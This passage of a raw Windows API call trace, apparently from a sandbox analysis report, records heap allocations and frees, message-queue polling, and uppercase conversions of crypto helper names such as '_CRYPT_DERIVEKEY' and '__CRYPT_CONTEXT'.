(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0213.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0213.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0213.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0213.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0213.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0213.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0213.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0213.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0213.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0213.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0213.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0213.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0213.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0213.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0213.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0213.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0213.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0213.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0213.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0213.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0213.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0213.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0213.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0213.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0213.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0213.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0213.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0213.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0213.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0213.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0213.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0213.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0213.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0213.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0213.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0213.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0213.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0213.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0213.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0213.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0214.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0214.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0214.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0214.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0214.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0214.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0214.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0214.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0214.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0214.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0214.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0214.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0214.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0214.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0214.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0214.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0214.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0214.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0214.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0214.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0214.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0214.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0214.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0214.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0214.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0214.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0214.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0214.021] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0214.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0214.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0214.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0214.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0214.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0214.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0214.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0214.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0214.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0214.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0214.021] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0214.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0214.021] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0214.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80220 | out: hHeap=0x970000) returned 1 [0214.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0214.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0214.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b58 [0214.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0214.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0214.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0214.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0214.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0214.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0214.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0214.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0214.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0214.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0214.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0214.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0214.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0214.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0214.022] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0214.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0214.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0214.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0214.023] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0214.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0214.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0214.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0214.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0214.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0214.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0214.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0214.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0214.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0214.023] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0214.023] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0214.023] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0214.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0214.023] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0214.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0214.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0214.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0214.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0214.024] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0214.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0214.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0214.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0214.024] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.024] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0214.024] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0214.024] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0214.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0214.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0214.025] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0214.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0214.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0214.025] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0214.025] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0214.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0214.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0214.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0214.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0214.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0214.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0214.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0214.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0214.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0214.025] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0214.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0214.026] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0214.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0214.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0214.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0214.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0214.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0214.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0214.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0214.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0214.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0214.026] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0214.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0214.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0214.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0214.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0214.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0214.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0214.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0214.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0214.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0214.027] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0214.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0214.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0214.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0214.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0214.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0214.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0214.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0214.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0214.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0214.027] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0214.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0214.028] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0214.028] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0214.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0214.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0214.028] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0214.028] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0214.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0214.028] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.028] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0214.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0214.028] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0214.028] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0214.028] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.028] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0214.028] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0214.029] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0214.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0214.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0214.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0214.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0214.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0214.029] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0214.029] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0214.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0214.029] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") 